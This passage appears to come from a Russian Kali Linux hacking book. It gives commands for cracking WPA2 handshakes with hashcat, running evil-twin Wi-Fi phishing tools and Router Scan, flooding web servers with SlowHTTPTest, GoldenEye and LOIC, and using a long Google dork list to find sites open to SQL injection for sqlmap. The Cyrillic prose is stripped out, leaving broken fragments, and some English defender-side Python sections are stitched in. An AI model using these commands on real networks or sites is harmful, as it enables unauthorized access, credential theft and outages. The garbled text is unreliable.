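The mask notation above maps directly onto a keyspace calculation, which is the number a defender actually needs when judging a password policy against a mask attack. The following Python is an added example, not part of the book and not hashcat's own code; it implements the built-in charsets (?l, ?u, ?d, ?s, ?a, ?b, with ?s being the space plus the 32 ASCII punctuation characters, so ?a has 95 members) and the -1 to -4 custom charsets, and returns how many candidates a mask generates. The rate passed to seconds_to_exhaust is whatever your own hardware measured; 15019 PMKs per second, the Pyrit figure quoted earlier in this chapter, is used below only as an illustration.

```python
# Added example (not from the book or from hashcat): a keyspace calculator for
# hashcat-style masks, so a defender can judge how quickly a password policy
# falls to a mask attack at a given candidate rate.
from __future__ import annotations
import string

# Built-in charsets as hashcat defines them (?s is space plus the 32 ASCII
# punctuation characters, ?b is every byte value).
BUILTIN: dict[str, str] = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,
    "b": "".join(chr(i) for i in range(256)),
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]


def expand_charset(spec: str, custom: dict[str, set[str]] | None = None) -> set[str]:
    """Expand a charset definition such as '?l?d' or '?dabcdef' into a set of characters.

    '?' followed by a built-in letter or a custom index (1-4) references that set;
    '??' is a literal '?'; any other character is taken literally.
    """
    custom = custom or {}
    chars: set[str] = set()
    i = 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            if key == "?":
                chars.add("?")
            elif key in BUILTIN:
                chars.update(BUILTIN[key])
            elif key in custom:
                chars |= custom[key]
            else:
                raise ValueError(f"unknown charset ?{key}")
            i += 2
        else:
            chars.add(spec[i])
            i += 1
    return chars


def mask_keyspace(mask: str, custom_specs: dict[str, str] | None = None) -> int:
    """Return the number of candidates a mask generates.

    custom_specs maps the index used on the command line to its definition,
    e.g. {"1": "?l?d?u"} for `-1 ?l?d?u`; a later custom set may reference an earlier one.
    """
    custom: dict[str, set[str]] = {}
    for idx in sorted(custom_specs or {}):
        custom[idx] = expand_charset(custom_specs[idx], custom)
    total = 1
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            key = mask[i + 1]
            if key == "?":
                width = 1
            elif key in BUILTIN:
                width = len(BUILTIN[key])
            elif key in custom:
                width = len(custom[key])
            else:
                raise ValueError(f"unknown charset ?{key}")
            i += 2
        else:
            width = 1          # a literal character contributes exactly one choice
            i += 1
        total *= width
    return total


def seconds_to_exhaust(keyspace: int, candidates_per_second: float) -> float:
    """Worst-case time to try every candidate at a measured rate."""
    return keyspace / candidates_per_second


if __name__ == "__main__":
    policy_mask = "?u?l?l?l?l?d?d?d"   # the Abcde123 shape from the text
    print(policy_mask, f"{mask_keyspace(policy_mask):,} candidates")
    print("abc?1?1?1?1?1 with -1 ?l?d?u", f"{mask_keyspace('abc?1?1?1?1?1', {'1': '?l?d?u'}):,} candidates")
    # 15019 PMKs/s is the Pyrit rate quoted earlier in the chapter, used as an illustration
    print("?d x 8 at 15019/s:", f"{seconds_to_exhaust(mask_keyspace('?d?d?d?d?d?d?d?d'), 15019):.0f} s")
```

The eight-digit mask gives 10^8 candidates, about 6,658 seconds at the illustrative rate, while the Abcde123 shape gives 26^5 * 10^3 candidates; comparing such figures against a realistic rate is the quickest way to decide whether a policy's required shape is actually doing any work.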
.cap wpaclean
.cap , Hashcat
(cudaHashcat oclHashcat).
.cap Kali Linux.
wpaclean <out.cap> <in.cap>
, , , ,
<out.cap> <in.cap>. , <in.cap> <out.cap>. ,
.
:
wpaclean hs/out.cap hs/Narasu_3E-83-E7-E9-2B-8D.cap
.cap .hccap
, Hashcat (cudaHashcat
oclHashcat).
.hccap aircrack-ng
-J
aircrack-ng <out.cap> -J <out.hccap>
-J J j.
:
aircrack-ng hs/out.cap -J hs/out
WPA2 WPA Hashcat
Hashcat (cudaHashcat oclHashcat) .
:



- , Rockyou.
, / ..
, WPA2
WPA. MD5, phpBB, MySQL
SHA1 Hashcat Kali Linux. :
hashcat --help | grep WPA
.. 2500.
:
hashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt
. , :
oclHashcat --force -m 2500 /root/hs/out.hccap /root/rockyou.txt
oclHashcat.
, cudaHashcat, :
cudaHashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt
, .
. ,
.
, , Pyrit -
cudaHashcat oclHashcat Hashcat.
95

, . ,
MD5, phpBB, MySQL SHA1 Hashcat Kali Linux
.

. .
WPA WPA2 Hashcat (cudaHashcat oclHashcat)
:
hashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d
-m = 2500 WPA2 WPA.
-a = 3 ( ).
capture.hccap = .cap.
wpaclean aircrack-ng.
?d?d?d?d?d?d?d?d = , d = . ,
, , 78964352 12345678 ..
, .
, .
, . ,
webware-1.hcmask. .
/usr/share/oclhashcat/masks/webware-1.hcmask.
, , oclHashcat :
ls /usr/share/oclhashcat/masks/
,
:
cudahashcat -m 2500 -a 3 /root/hs/out.hccap /usr/share/oclhashcat/masks/webware-1.hcmask
.hcmask file
.hcmask :
tail -10 /usr/share/oclhashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask
Hashcat (cudaHashcat
oclHashcat) .

Hashcat (cudaHashcat oclHashcat) .
, Hashcat.
, . . /root.
cat hashcat.pot

. ,
hashcat.net, .
.
, : ,
, , , ,
.
( ),
WebWare.biz. , !

Wifite Pixiewps

Pixiewps. :
1. pixie dust attack
2. Pixiewps Wiire
3. Pixiewps Reaver (t6x)
96

4. Reaver (t6x) Pixiewps Pixiewps


Kali Linux
5. Wifite Pixiewps
, Pixiewps,
.
, Wifite Pixiewps
Kali Linux. ,
. .
https://github.com/aanarchyy/wifite-mod-pixiewps
, (wifite-ng),
. (,
Kali Linux SSH, ,
. .
, :
wget --output-document=/usr/bin/wifite-ng https://raw.githubusercontent.com/aanarchyy/wifite-mo
:
chmod +x /usr/bin/wifite-ng
!
:
wifite-ng

-pto <sec> # pixiewps, 660
-ponly # pixiewps M3
-pnopsk # reaver
-paddto <sec> # n , 30
-update # wifite
-endless # ,

Kali Linux. Kali .
Pixiewps Wiire

reaver-wps-fork-t6x t6x

pixiewps, reaver,
.
.

.
( ).
(, , ,
. .).
,
pixiewps reaver
github
mdk3
.
97

Wi-Fi : , Kali Linux

Kali Linux , ,
. Kali
,
.
, ,
. ,
.
. (Wi-Fi).
,
.
,
. .
, . . .
Kali?,
: .
:
;
;
;
() ;
98

/ / ,
.
( ) ,
,
. ,
. , ,
.
,
. .
cd ~
mkdir opt
wifiphisher
: https://github.com/sophron/wifiphisher
Wifiphisher WiFi
.
. .. .
WPA/WPA2.
Wifiphisher Kali Linux MIT .
, :
1. . Wifiphisher
wifi
(deauth)
, .
2. . Wifiphisher
. ,
. NAT/DHCP
. , -
. --.
3.
. wifiphisher - HTTP & HTTPS
. , wifiphisher
, , , ,
, WPA .
wifiphisher
, .
hostapd, , , :
apt-get install hostapd
wifiphisher
cd ~/opt
git clone https://github.com/sophron/wifiphisher
cd wifiphisher/
:
python wifiphisher.py
99

wifiphisher?
100

,
,
waidps. .
waidps
: https://github.com/SYWorks/waidps
waidps , .

.
.
. .
, waidps
. .
WAIDPS , Python
Linux. , Kali,
/ . .. Kali Linux
.
, ( ) ,
( WEP/WPA/WPS)
( ). , WiFi
.
: MAC SSID
.
WAIDS , ,
,
. .
, , .
WAIDS (
, WIDS):
Association / Authentication flooding
,
WPA
WEP ARP

WEP chopchop
WPS Reaver, Bully ..
- (Evil-Twin)

waidps
cd ~/opt
git clone https://github.com/SYWorks/waidps
cd waidps
python waidps.py
:
101

Chopchop:

Chopchop :

Chopchop :
102

3vilTwinAttacker
: https://github.com/P0cL4bs/3vilTwinAttacker
Wi-Fi,
, .
:
Kali linux.
Ettercap.
Sslstrip.
Airbase-ng aircrack-ng.
DHCP.
Nmap.
3vilTwinAttacker
cd ~/opt
git clone https://github.com/P0cL4bs/3vilTwinAttacker
cd 3vilTwinAttacker
chmod +x install.sh
./install.sh --install

python 3vilTwin-Attacker.py
[ DHCP Debian ]
Ubuntu
$ sudo apt-get install isc-dhcp-server
Kali linux
apt-get install isc-dhcp-server
[ DHCP redhat ]
Fedora
$ sudo yum install dhcp
103

linset
: https://github.com/vk496/linset
linset " " (Evil Twin Attack).
linset
104

.
Kali Linux ( ).
. :
apt-get install isc-dhcp-server lighttpd macchanger php5-cgi macchanger-gtk

. linset , ,
.
:
cd ~/opt
git clone https://github.com/vk496/linset
cd linset
chmod +x linset
./linset
linset


( )
-
,
DHCP
DNS
-
,
, , -

,

Router Scan by StasM Kali Linux ( Wi-Fi )

, Router Scan Stas'M !


.
:
, , -
(, .)


, ,
. , , -, Wi-Fi,
. .
, , ,
. .
, Linux.
.

,
- Linux. , . .
. : nmap ( ) +
curl ( ) + grep (
( )
/ ).
,
1000 Wi-Fi. : PHP,
105

,
. ..
.
, .
, , ,
. ,
. , , ( nmap,
PHP) ,
. ,
Stas'M, curl.
106
107

Router Scan Stas'M. !


, Wi-Fi
.
Windows, , ,
.
Linux Router Scan Stas'M
Wine. Kali Linux.
Wine Kali Linux
Wine Kali Linux, ,
. , , -
, .
:
dpkg --add-architecture i386
apt-get update
apt-get install wine-bin:i386
Router Scan Stas'M, ( ),
RouterScan.exe, Wine,
Windows.
Router Scan Stas'M Linux (
):

:
108

- :
Wi-Fi -
;
Wi-Fi ( ),
IP , , IP - .
,
IP, IP .
, , , :

mvd.ru
109

4. -

- (DoS -) SlowHTTPTest Kali Linux: slowloris, slow body slow


read

- ,
, () .
, mod_evasive
DoS .
-:
- Apache mod_security mod_evasive CentOS
DoS:
- Low Orbit Ion Cannon (LOIC)
- (DoS -) SlowHTTPTest Kali Linux: slowloris, slow body slow
read ( )
SlowHTTPTest ,
(DoS) .
Linux, OSX Cygwin (Unix-
Microsoft Windows).
DoS
, Slowloris, slow body, Slow Read (
TCP), , Apache
Range Header,
.
Slowloris Slow HTTP POST DoS , HTTP, ,
, .
HTTP ,
, .
, .
HTTP, HTTP .
Slow Read , slowloris slow body,
, HTTP , .
SlowHTTPTest
Kali Linux
Kali Linux apt-get .. ( !)
apt-get install slowhttptest
110

Linux
, . .
, , , .
: SlowHTTPTest,
:

(t=`curl -s https://code.google.com/p/slowhttptest/downloads/list | grep -E -o '//slowhttptest.googlecode.com/files/slowhttptest(.)*.tar.gz" onclick="' | sed 's/\/\///' | sed 's/" onclick="//' | head -1`; curl -s $t -o slowhttptest-last.tar.gz) && tar -xzvf slowhttptest-last.tar.gz && cd slowhttptest-*

.. , .
, , .
$ tar -xzvf slowhttptest-x.x.tar.gz
$ cd slowhttptest-x.x
$ ./configure --prefix=PREFIX
$ make
$ sudo make install
PREFIX , slowhttptest
.
libssl-dev .
.
Mac OS X
Homebrew:
brew update && brew install slowhttptest
Linux
, slowhttptest (
Kali Linux).
SlowHTTPTest
111

slowhttptest , .
.
slow body a.k.a R-U-Dead-Yet,

slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.37/info.php -x 10 -p 3
,
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.37/info.php -x 10 -p 3
[Chart: Test results against http://192.168.1.37/info.php; series: Closed, Pending, Connected, Service available; axes: Seconds, Connections]
, ,
. , . ,
,
.

slow headers a.k.a. Slowloris


slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u http://192.168.1.37/info.php -x 24 -p 3
,
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u http://192.168.1.37/info.php -x 24 -p 3
: :
112
113

Slow Read .
x.x.x.x:8080 , - IP
:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://192.168.1.37/info.php -p 5 -l 350 -e x.x.x.x:8080
:
114
115

SlowHTTPTest
,
5 , (
1), ( 4).
-g CSV, HTML,
Google Chart.

,
.
CSV
, MS Excel, iWork Numbers Google Docs.
, , ,
:
Hit test time limit , -l
No open connections left
Cannot establish connection N ,
N -i, 10 ( ).
.
Connection refused (
? )
Cancelled by user Ctrl-C SIGINT -
Unexpected error .
SlowHTTPTest
, .
,
. .

116

, http://192.168.1.37 1000 .
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168

-
root@WebWare-Debian:~# netstat | grep http | wc -l
111

, . . SSH
. http 111 10 .
(
VPS).
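The `netstat | grep http | wc -l` check above only gives a total. On the defending side the more useful number is how many of those sockets each peer address is holding, because a slow-HTTP test ties up many connections from a single source. The following is an added defender-side example, not code from the original text or from SlowHTTPTest; it parses output in the column layout of `ss -tan` (the sample below is constructed, not a real capture) and flags peers that hold more than a threshold of sockets on the web port.

```python
"""Per-peer count of open sockets on a web port, from `ss -tan`-style text.
Added defender-side example; SAMPLE_SS_OUTPUT is constructed, not captured."""
import re
from collections import Counter

# Constructed sample in the column layout of `ss -tan`:
# State, Recv-Q, Send-Q, Local Address:Port, Peer Address:Port.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN  0      128    0.0.0.0:80          0.0.0.0:*
ESTAB   0      0      192.168.1.37:80     192.168.1.55:50001
ESTAB   0      0      192.168.1.37:80     192.168.1.55:50002
ESTAB   0      0      192.168.1.37:80     192.168.1.55:50003
SYN-RECV 0     0      192.168.1.37:80     192.168.1.55:50004
ESTAB   0      0      192.168.1.37:80     10.0.0.3:41000
ESTAB   0      0      192.168.1.37:22     10.0.0.3:41001
"""

# state, recv-q, send-q, local addr:port, peer addr:port
LINE_RE = re.compile(r"^(\S+)\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\S+)$")


def connections_by_peer(ss_output: str, local_port: int = 80) -> Counter:
    """Count non-LISTEN sockets on local_port, keyed by peer IP address."""
    counts = Counter()
    for line in ss_output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # header line or unexpected layout
        state, _local_ip, lport, peer_ip, _pport = m.groups()
        if state == "LISTEN" or int(lport) != local_port:
            continue
        counts[peer_ip] += 1
    return counts


def total_connections(ss_output: str, local_port: int = 80) -> int:
    """The equivalent of `netstat | grep http | wc -l`, but port-exact."""
    return sum(connections_by_peer(ss_output, local_port).values())


def suspicious_peers(counts: Counter, threshold: int = 3) -> list:
    """Peers holding more than `threshold` sockets, busiest first."""
    return sorted((ip for ip, n in counts.items() if n > threshold),
                  key=lambda ip: -counts[ip])


if __name__ == "__main__":
    by_peer = connections_by_peer(SAMPLE_SS_OUTPUT)
    print(total_connections(SAMPLE_SS_OUTPUT), "sockets on :80")
    print("over threshold:", suspicious_peers(by_peer))
```

On a live host replace `SAMPLE_SS_OUTPUT` with the output of `ss -tan`; half-open (`SYN-RECV`) sockets are counted on purpose, since a slow-headers test keeps connections in early states.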
DoS
DoS , , ,

( ),
DoS , , SlowHTTPTest
.

, ,
- ,
. , DoS IP
() . .
,
-.

Windows, Linux Mac. DoS
, GoldenEye, hping3 -,
. DoS (,
- ). , ,
-, .
WebWare.biz!

- : DoS - Kali Linux GoldenEye

WebWare.biz DoS,
HTTP, - .
GoldenEye , , 30
, , . ,
WAF, IDS.
- .
iptables/
.
GoldenEye:
: GoldenEye
: Jan Seidl
-: http://wroot.org/
GoldenEye:
1.
.
2. GoldenEye
!
3. GoldenEye HTTP DoS.
4. : HTTP Keep Alive + NoCache
DoS DDoS
DoS . DDoS.
DoS DDoS :
1. DoS DDoS
2. DoS DDoS
3. DoS DDoS
DoS DDoS
DoS DDoS , Windows, Apache,
OpenBSD .
DoS DDoS
DoS DDoS .
Synflood, Ping of Death .
DoS DDoS
ICMP-, UDP- ,
.

DoS DDoS . ,
DoS . ( )
DDoS . , , , . .
/.
GoldenEye
, , ~/opt.
, :
mkdir opt
cd opt
, GoldenEye,
GoldenEye ( ):
mkdir GoldenEye && cd GoldenEye && wget https://github.com/jseidl/GoldenEye/archive/master
, .
GoldenEye, :
root@WebWare-Kali:~/opt# mkdir GoldenEye
root@WebWare-Kali:~/opt# cd GoldenEye
root@WebWare-Kali:~/opt/GoldenEye# wget
https://github.com/jseidl/GoldenEye/archive/master.zip

master.zip.
unzip master.zip

GoldenEye-master,
:
ls
cd GoldenEye-master/
ls

GoldenEye -
, :
./goldeneye.py
:


. .
: ( )
. ,
.
.
, .
:
root@WebWare-Kali:~/opt/GoldenEye/GoldenEye-master# ./goldeneye.py
http://www.goldeneyetestsite.com/
()
sudo ./goldeneye.py http://www.goldeneyetestsite.com/
()
python goldeneye.py http://www.goldeneyetestsite.com/
, , .
GoldenEye:
top:

.. , ,
350 .

./goldeneye.py http://192.168.1.37/info.php


, - ,
, .

, ( -
, ).
GoldenEye
:
cat /var/log/apache2/access.log | grep -E '192.168.1.55'
grep -E '192.168.1.55', ,
.
:
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?vySSDx=tG1rmfX4HbYXBm&CKV
Safari/535.17"
192.168.1.55 - - [18/Jun/2015:17:06:48 +0700] "GET /info.php?dC1FyXpw=hB6Oh&rjcf74A=YV
AppleWebKit/536.12 (KHTML, like Gecko) Chrome/10.0.623.89 Safari/536.26"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?0Nk7p=kSf&1eVF8PNy=UpDtxpDmJ
Firefox/12.0"
192.168.1.55 - - [18/Jun/2015:17:06:51
"http://www.google.com/gCqMk2Q05?DxQe=67gW4HUd3iTKCu2qWSJ&ngWHMmS1=5XyoGh6q2
(Linux x86_64; X11) Gecko/20010905 Firefox/17.0"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?jA5Kw=fwtSMfaPQ8XtCaK&Y0fBbD
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?t2U0aYjxm=q21n4BARB1&qxI1=cT
Chrome/18.0.1844.44 Safari/537.21"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?nkIkop=6pivICjNb6&U3Y=dDlbGnW
OS X 11_6_2)"
192.168.1.55 - - [18/Jun/2015:17:06:48 +0700]
"http://www.baidu.com/fWaBwllK?aNP85MesWv=VhL6v32qtwyj&6CLwEBed=Eb73YTA24oYXmL
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_4_1) AppleWebKit/536.10 (KHTML, like Gecko) Chrom
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?so64O=2GhoHQaFy&DSmxwEW
"Mozilla/5.0 (Windows; U; MSIE 10.0; Windows NT 5.1; .NET CLR 2.2.16303; Win64; x64)"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?EXRbe03wp=fEBV5exjikcr8oNbEkmN
.NET CLR 1.0.1395; X11)"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?7xIRdP0=8mjyacN&kEd2MwYtJ=bW
10_5_0) Gecko/20062612 Firefox/18.0"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?lVn80y605=IDRbDmoiDyNBu HTTP/
192.168.1.55 - - [18/Jun/2015:17:06:52 +0700] "GET /info.php?mAthtfI=c4QdAopYyQGAsJAl0XUH
Safari/537.21"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?1nwS7r=g6qpYcfOre HTTP/1.1" 200 6
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?00iHfl2=CGhueehx3DqR32D&MnPMI
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?Ml1k=DFVW0F7 HTTP/1.1" 200 6950
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?khUn=xnRp0gXjlF&bl8TpeXEF
AppleWebKit/537.3 (KHTML, like Gecko) Version/5.1.2 Safari/536.32"

, GET ,
, Bing, Baidu, Yandex
.
, - ?
, URL, Referrer
200 OK. ? .
, ,
, IP ( IP
?) (Firefox, Chrome, MSIE, Safari . .),
(Mac, Linux, Windows ..) . ,
URL , -
,

(, Apache worker/socket). - X
IP /
,
(HTTP 503 ). ,
proxy/VPN .
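The log excerpt above shows the pattern a server operator can key on: one source address, several requests in the same second, a different User-Agent and Referer on almost every line, all answered 200. The following is an added example of turning that observation into detection logic; it is not code from the original text or from the GoldenEye project. The log lines are constructed in Apache "combined" format to mirror the excerpt (the real lines on the page are truncated), and the thresholds are assumptions to tune per site.

```python
"""Flag HTTP-flood sources in Apache combined logs by request rate plus
User-Agent churn.  Added defender-side example; SAMPLE_LOG is constructed."""
import re
from datetime import datetime

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')

# Constructed lines modelled on the excerpt above: one flooding IP rotating
# User-Agent and Referer per request, and one ordinary visitor.
SAMPLE_LOG = """\
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?vySSDx=tG1rm HTTP/1.1" 200 6950 "-" "Mozilla/5.0 (Windows NT 6.1) Safari/535.17"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?dC1FyXpw=hB6Oh HTTP/1.1" 200 6950 "http://www.google.com/gCqMk2Q05" "Mozilla/5.0 (X11; Linux x86_64) Chrome/10.0.623.89"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?0Nk7p=kSf HTTP/1.1" 200 6950 "http://www.baidu.com/fWaBwllK" "Mozilla/5.0 (Windows NT 5.1) Firefox/12.0"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?jA5Kw=fwtSM HTTP/1.1" 200 6950 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_4_1) Chrome/18.0"
192.168.1.55 - - [18/Jun/2015:17:06:52 +0700] "GET /info.php?mAthtfI=c4Qd HTTP/1.1" 200 6950 "-" "Mozilla/5.0 (Windows; U; MSIE 10.0; Windows NT 5.1)"
10.0.0.7 - - [18/Jun/2015:17:06:51 +0700] "GET /index.html HTTP/1.1" 200 1200 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/38.0"
10.0.0.7 - - [18/Jun/2015:17:06:55 +0700] "GET /style.css HTTP/1.1" 200 310 "http://192.168.1.37/index.html" "Mozilla/5.0 (X11; Linux x86_64) Firefox/38.0"
"""


def parse_combined(log_text):
    """Yield one dict per well-formed combined-format line; skip the rest."""
    for line in log_text.splitlines():
        m = COMBINED_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield rec


def ip_profiles(log_text):
    """Per source IP: request count, distinct User-Agents and Referers,
    and the first/last timestamp seen."""
    prof = {}
    for rec in parse_combined(log_text):
        p = prof.setdefault(rec["ip"], {"requests": 0, "agents": set(),
                                        "referers": set(),
                                        "first": rec["time"], "last": rec["time"]})
        p["requests"] += 1
        p["agents"].add(rec["ua"])
        p["referers"].add(rec["ref"])
        p["first"] = min(p["first"], rec["time"])
        p["last"] = max(p["last"], rec["time"])
    return prof


def flood_suspects(log_text, min_rps=3.0, min_agents=3):
    """IPs whose request rate AND User-Agent count both exceed thresholds.
    A real browser reuses one User-Agent; a GoldenEye-style flooder rotates
    them, so the combination separates floods from busy legitimate clients."""
    out = {}
    for ip, p in ip_profiles(log_text).items():
        span = max((p["last"] - p["first"]).total_seconds(), 1.0)
        rps = p["requests"] / span
        if rps >= min_rps and len(p["agents"]) >= min_agents:
            out[ip] = {"rps": rps, "agents": len(p["agents"]),
                       "referers": len(p["referers"])}
    return out


if __name__ == "__main__":
    for ip, info in flood_suspects(SAMPLE_LOG).items():
        print(f"{ip}: {info['rps']:.1f} req/s, {info['agents']} agents, "
              f"{info['referers']} referers")
```

The result is what you would feed to the per-IP limit or 503 response mentioned in the text; read the real log with `open("/var/log/apache2/access.log").read()` in place of `SAMPLE_LOG`.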
IP :
root@kali:~/GoldenEye/GoldenEye-master# ./goldeneye.py http://www.goldeneyetestsite.com/ -w 10 -s 10 -m random
:
-w = 10
-s = 10
-m = , GET POST
DoS!
Google Analytics GoldenEye
, , -
. , Google Analytics
( IP,
Google , ).
:
Google, . .
.
Google , -
Google.
.
/ GoldenEye
, Apache:
1. IP ( 300 IP Apache)
2. IP
3. KeepAlive Connection Timeout ( 300)
4. , .
, .
5. Web application Firewall (WAF).
6.
.
7. NGINX Node.js .

GoldenEye ( ) HTTP Flooder .
, NoCache KeepAlive GoldenEye .
,
, .
, -
( ), - -
, GET POST .
. WAF .

. . .

- Low Orbit Ion Cannon (LOIC)



Low Orbit Ion Cannon (LOIC)


Low Orbit Ion Cannon (LOIC) - , ,
, .
.
, ,
- .
Anonymous, DDoS
-,
. , , ,
- ; ,
LOIC
.
Low Orbit Ion Cannon (LOIC) Windows
Windows .
. !

Low Orbit Ion Cannon (LOIC) Linux


LOIC Linux, , ,
Kali Linux.
LOIC :
apt-get update
aptitude install git-core monodevelop
apt-get install mono-gmcs

, , Kali Linux, .
Ubuntu, Linux Mint ( Debian), :
sudo apt-get install mono-complete
, ,
cd ./Desktop
loic, :
mkdir loic

,
cd ./loic
:
wget https://raw.github.com/nicolargo/loicinstaller/master/loic.sh

:
chmod 777 loic.sh
:
./loic.sh install
- ,
loic. , :
./loic.sh update
, LOIC. :
./loic.sh run

, , Windows ( )?
Linux !
- Low Orbit Ion Cannon (LOIC)
LOIC . IRC .
. URL IP .
. Lock on. : TCP, UDP HTTP. HTTP.
. , IMMA
CHARGIN MAH LAZER. LOIC . Stop Flooding
:

.. , Windows
Linux. , IRC ,
.
.

5. -

SQLMAP Kali Linux: - SQL-


Windows, "
sqlmap Windows". ,
" : SQL-".
, , Kali Linux,
, ? ,
- . , , ,
. ()
,
-. ,
PHP, , !
-
.
SQLMAP,
SQL-.
, , , ,
.
SQL- , ,
, ( ) SQL
(, ).
SQL- , ,
,
SQL ,
. SQL-
-, SQL .
SQLMAP SQL-
Kali Linux , , - ( , )
Kali Linux.
: Kali Linux,
Kali Linux:
.
, WebWare.biz Kali Linux.
SQLMAP
sqlmap ,
SQL-
. ,


,
.

MySQL, Oracle, PostgreSQL,
Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase SAP MaxDB.
SQL-: ,
, , UNION ,
.

SQL-
, IP , .
, , , , ,
.

.
, , ,
.

.
,
. , ,
, ,
name pass ( ).
()
, MySQL, PostgreSQL
Microsoft SQL Server.

, ,
MySQL, PostgreSQL Microsoft SQL Server.
(out-of-band) TCP
.
, Meterpreter
(VNC) .
Metasploit
Meterpreter.
, ,
- , , .
- , . ,
.
, :
1: -
, , , .
, Google Dorks , . ,
, , .
- , , .
1.: Google Dorks SQLMAP SQL -
. .
, .
, .
Google Dork string (Column 1) Google Dork string (Column 2) Google Dork string (Column 3)
inurl:item_id= inurl:review.php?id= inurl:hosting_info.php?id=
inurl:newsid= inurl:iniziativa.php?in= inurl:gallery.php?id=
inurl:trainers.php?id= inurl:curriculum.php?id= inurl:rub.php?idr=
inurl:news-full.php?id= inurl:labels.php?id= inurl:view_faq.php?id=
inurl:news_display.php?getid= inurl:story.php?id= inurl:artikelinfo.php?id=
inurl:index2.php?option= inurl:look.php?ID= inurl:detail.php?ID=
inurl:readnews.php?id= inurl:newsone.php?id= inurl:index.php?=
inurl:top10.php?cat= inurl:aboutbook.php?id= inurl:profile_view.php?id=
inurl:newsone.php?id= inurl:material.php?id= inurl:category.php?id=

inurl:event.php?id= inurl:opinions.php?id= inurl:publications.php?id=


inurl:product-item.php?id= inurl:announce.php?id= inurl:fellows.php?id=
inurl:sql.php?id= inurl:rub.php?idr= inurl:downloads_info.php?id=
inurl:index.php?catid= inurl:galeri_info.php?l= inurl:prod_info.php?id=
inurl:news.php?catid= inurl:tekst.php?idt= inurl:shop.php?do=part&id=
inurl:index.php?id= inurl:newscat.php?id= inurl:productinfo.php?id=
inurl:news.php?id= inurl:newsticker_info.php?idn= inurl:collectionitem.php?id=
inurl:index.php?id= inurl:rubrika.php?idr= inurl:band_info.php?id=
inurl:trainers.php?id= inurl:rubp.php?idr= inurl:product.php?id=
inurl:buy.php?category= inurl:offer.php?idf= inurl:releases.php?id=
inurl:article.php?ID= inurl:art.php?idm= inurl:ray.php?id=
inurl:play_old.php?id= inurl:title.php?id= inurl:produit.php?id=
inurl:declaration_more.php?decl_id= inurl:news_view.php?id= inurl:pop.php?id=
inurl:pageid= inurl:select_biblio.php?id= inurl:shopping.php?id=
inurl:games.php?id= inurl:humor.php?id= inurl:productdetail.php?id=
inurl:page.php?file= inurl:aboutbook.php?id= inurl:post.php?id=
inurl:newsDetail.php?id= inurl:ogl_inet.php?ogl_id= inurl:viewshowdetail.php?id=
inurl:gallery.php?id= inurl:fiche_spectacle.php?id= inurl:clubpage.php?id=
inurl:communique_detail.php?id= inurl:article.php?id= inurl:memberInfo.php?id=
inurl:show.php?id= inurl:sem.php3?id= inurl:section.php?id=
inurl:staff_id= inurl:kategorie.php4?id= inurl:theme.php?id=
inurl:newsitem.php?num= inurl:news.php?id= inurl:page.php?id=
inurl:readnews.php?id= inurl:index.php?id= inurl:shredder-categories.php?id=
inurl:top10.php?cat= inurl:faq2.php?id= inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID= inurl:historialeer.php?num= inurl:show_an.php?id=
inurl:reagir.php?num= inurl:preview.php?id= inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num= inurl:loadpsb.php?id= inurl:transcript.php?id=
inurl:forum_bds.php?num= inurl:opinions.php?id= inurl:channel_id=
